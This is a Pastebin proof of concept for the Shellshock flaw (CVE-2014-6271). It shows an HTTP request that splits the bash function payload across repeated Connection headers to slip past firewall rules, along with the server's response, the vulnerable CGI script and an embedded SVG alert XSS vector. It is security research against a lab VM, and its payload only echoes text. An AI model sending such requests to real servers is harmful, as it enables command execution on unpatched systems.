SHARE
TWEET

cve-2014-6271 PoC by using HHP - @irsdl

a guest Sep 26th, 2014 3,946 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. ~~ cve-2014-6271 PoC by Using HTTP Header Pollution (HHP) to Bypass Some Firewall Rules ~~
  2. By Soroush Dalili (@irsdl)
  3. Based on a vulnerable sample - VM downloadable from http://files.pentesterlab.com/cve-2014-6271/cve-2014-6271.iso
  4.  
  5. Note 1: Space characters are important
  6. Note 2: It can hide some other vectors such as "'<'s'v'g' o'n'l'o'a'd'='a'l'e'r't'('1')' '>' "  - just interesting
  7. Note 3: Look at the request "<<WHY? Look @ ENV>> " and its response "Look @ ENV >> , <<WHY? & WHY?" - also interesting
  8. Note 4: Didn't have any actual live firewall to test this on a live product!!!
  9.  
  10. [Request:]
  11. ------------
  12. GET /cgi-bin/status HTTP/1.1
  13. HOST: test
  14. Connection:    
  15.  ()
  16.  {<<WHY? Look @ ENV>>
  17. abcd: A
  18. Connection: &};echo "
  19. abcd: B
  20. Connection: GoesToResponseBody"'<'s'v'g' o'n'l'o'a'd'='a'l'e'r't'('1')' '>' "
  21. abcd: C
  22. Connection: "&echo
  23.  -e "GoesToResponseHeader\x3a@IRSDL"
  24.  
  25.  
  26. ------------
  27.  
  28. [Response:]
  29. ------------
  30. HTTP/1.1 200 OK
  31. Date: Fri, 26 Sep 2014 00:51:50 GMT
  32. Server: Apache/2.2.21 (Unix) DAV/2
  33. GoesToResponseHeader: @IRSDL
  34. Content-Type: application/json
  35. Content-Length: 859
  36.  
  37. , GoesToResponseBody<svg onload=alert(1) > ,
  38. { "uptime": " 00:51:50 up 12:09, 1 users, load average: 0.00, 0.01, 0.04", "kernel": "Linux vulnerable 3.14.1-pentesterlab #1 SMP Sun Jul 6 09:16:00 EST 2014 i686 GNU/Linux"}
  39.  
  40. SERVER_SIGNATURE= HTTP_ABCD=A, B, C UNIQUE_ID=VCS4pn8AAAEAAANqBIIAAACU SERVER_PORT=80 HTTP_HOST=test DOCUMENT_ROOT=/var/www/ SCRIPT_FILENAME=/var/www/cgi-bin/status REQUEST_URI=/cgi-bin/status SCRIPT_NAME=/cgi-bin/status REMOTE_PORT=38403 PATH=/usr/local/sbin:/usr/local/bin:/sbin:/usr/sbin:/bin:/usr/bin PWD=/var/www/cgi-bin SERVER_ADMIN=louis@pentesterlab.com REMOTE_ADDR=192.168.1.1 SHLVL=1 SERVER_NAME=test SERVER_SOFTWARE=Apache/2.2.21 (Unix) DAV/2 QUERY_STRING= SERVER_ADDR=192.168.1.132 GATEWAY_INTERFACE=CGI/1.1 SERVER_PROTOCOL=HTTP/1.1 REQUEST_METHOD=GET HTTP_CONNECTION=() { Look @ ENV >> , <<WHY? & WHY? } _=/usr/bin/env
  41.  
  42. ------------
  43.  
  44. [cgi-bin/status source code:]
  45. ------------
  46. #!/bin/bash
  47.  
  48. echo "Content-Type: application/json";
  49. echo ""
  50. echo '{ "uptime": "'`uptime`'", "kernel": "'`uname -a`'"} '
  51. # the rest added
  52. echo ""
  53. echo $(env)
  54. ------------
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Top